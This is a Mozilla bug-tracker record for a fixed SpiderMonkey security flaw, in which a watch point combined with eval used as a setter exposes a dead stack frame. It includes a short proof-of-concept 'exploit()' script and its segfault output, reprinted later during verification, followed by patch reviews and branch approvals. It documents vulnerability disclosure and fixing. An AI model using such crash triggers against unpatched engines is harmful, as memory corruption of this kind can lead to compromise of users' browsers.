Closed
Bug 390597
Opened 17 years ago
Closed 17 years ago
watch point + eval-as-setter allows access to dead JSStackFrame
Categories
(Core :: JavaScript Engine, defect)
Core
JavaScript Engine
Tracking
()
VERIFIED
FIXED
People
(Reporter: sync2d, Assigned: mrbkap)
Details
(4 keywords, Whiteboard: [sg:critical?])
Attachments
(3 files)
1.22 KB,
patch
|
brendan
:
review+
brendan
:
approval1.9+
|
Details | Diff | Splinter Review |
2.64 KB,
text/plain
|
Details | |
1.22 KB,
patch
|
mrbkap
:
review+
dveditz
:
approval1.8.1.12+
asac
:
approval1.8.0.next+
|
Details | Diff | Splinter Review |
$ cat watch-point-dead-stack.txt function exploit() { var obj = this, args = null; obj.__defineSetter__("evil", eval); obj.watch("evil", function() { return "args = arguments;"; }); obj.evil = null; eval("print(args[0]);"); } exploit(); $ gdb --eval run --args dbg.obj/js watch-point-dead-stack.txt ... Program received signal SIGSEGV, Segmentation fault. 0x0043729b in JS_GetReservedSlot (cx=<incomplete type>, obj=0x1, index=0, vp=0xa4e2cc) at jsapi.c:3971 3971 clasp = OBJ_GET_CLASS(cx, obj);
Assignee | ||
Comment 1•17 years ago
|
||
Wow, I didn't know it was possible to create an arguments object for the pseudo-frame. It's getting to be more and more like a real frame every day!
Comment 2•17 years ago
|
||
Comment on attachment 275031 [details] [diff] [review] FIx Indeed. Need to be careful there isn't more like this (I don't know of any, just sayin'). /be
Attachment #275031 -
Flags: review?(brendan)
Attachment #275031 -
Flags: review+
Attachment #275031 -
Flags: approval1.9?
Comment 3•17 years ago
|
||
Comment on attachment 275031 [details] [diff] [review] FIx Sorry, a=me. /be
Attachment #275031 -
Flags: approval1.9? → approval1.9+
Assignee | ||
Comment 4•17 years ago
|
||
Fix checked into trunk, finally.
Status: ASSIGNED → RESOLVED
Closed: 17 years ago
Resolution: --- → FIXED
Comment 5•17 years ago
|
||
I am sure this is a stoopid question, but why does the browser throw "EvalError: function eval must be called directly, and not by way of a function of another name" but the shell doesn't?
Updated•17 years ago
|
Flags: in-testsuite+
Assignee | ||
Comment 6•17 years ago
|
||
Sounds like another XOW problem. Try using 'obj.eval' as the setter function?
Comment 7•17 years ago
|
||
(In reply to comment #6) > Sounds like another XOW problem. Try using 'obj.eval' as the setter function? > that removed the EvalError. Bug?
Assignee | ||
Comment 8•17 years ago
|
||
Yeah, it's a bug.
Comment 9•17 years ago
|
||
bug 397071
Comment 10•17 years ago
|
||
verified fixed 1.9.0 linux/mac*/win this crashes in the browser 1.8.1. do we want it on the branch?
Status: RESOLVED → VERIFIED
Updated•17 years ago
|
Flags: blocking1.8.1.9?
Updated•17 years ago
|
Flags: blocking1.8.1.10?
Comment 11•17 years ago
|
||
blake, brendan: does this patch work for the 1.8 branch or do we need a different fix (or none)? Can we land this in a day or two, or should we wait for 1.8.1.11?
Whiteboard: [sg:critical?]
Updated•17 years ago
|
Flags: blocking1.8.1.10?
Updated•17 years ago
|
Flags: wanted1.8.1.x+
Flags: blocking1.8.1.12?
Flags: blocking1.8.1.12+
Comment 12•17 years ago
|
||
If this patch applies to the 1.8 branch can you please request approval? Otherwise, please attach a branch patch. (QA: To test, use the JS 'shell' bookmarklet.)
Keywords: testcase
Whiteboard: [sg:critical?] → [sg:critical?] [need 1.8 branch patch]
Assignee | ||
Comment 13•17 years ago
|
||
I had to hand merge because the watchpoint thread-safety fixes never went in on the 1.8 branch. The patch was trivial to merge.
Attachment #294507 -
Flags: review+
Attachment #294507 -
Flags: approval1.8.1.12?
Updated•17 years ago
|
Whiteboard: [sg:critical?] [need 1.8 branch patch] → [sg:critical?]
Comment 14•17 years ago
|
||
Comment on attachment 294507 [details] [diff] [review] 1.8 branch patch approved for 1.8.1.12, a=dveditz for release-drivers
Attachment #294507 -
Flags: approval1.8.1.12? → approval1.8.1.12+
I crashed 2.0.0.11 by pasting (with much-cleaner linebreaks!): function exploit() { try { var obj = this, args = null; obj.__defineSetter__("evil", eval); obj.watch("evil", function() { return "args = arguments;"; }); obj.evil = null; eval("print(args[0]);"); } catch(ex) { print('Caught ' + ex); } } exploit(); into Jesse's handy JS "shell" bookmarklet, on Windows XP. With Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080128 Firefox/2.0.0.12, I get |undefined|, and no crash. Replacing fixed1.8.1.12 with verified1.8.1.12; special thanks to bc for the support/sanity-checking.
Keywords: fixed1.8.1.12 → verified1.8.1.12
Updated•17 years ago
|
Group: security
Updated•16 years ago
|
Flags: blocking1.8.0.15+
Comment 17•16 years ago
|
||
Comment on attachment 294507 [details] [diff] [review] 1.8 branch patch a=asac for 1.8.0.15 (unmodified distro patch)
Attachment #294507 -
Flags: approval1.8.0.15+
Comment 18•16 years ago
|
||
MOZILLA_1_8_0_BRANCH: Checking in js/src/jsdbgapi.c; /cvsroot/mozilla/js/src/jsdbgapi.c,v <-- jsdbgapi.c new revision: 3.56.2.1.4.13; previous revision: 3.56.2.1.4.12 done
Keywords: fixed1.8.0.15
Comment 19•16 years ago
|
||
/cvsroot/mozilla/js/tests/js1_5/extensions/regress-390597.js,v <-- regress-390597.js initial revision: 1.1
You need to log in
before you can comment on or make changes to this bug.
Description
•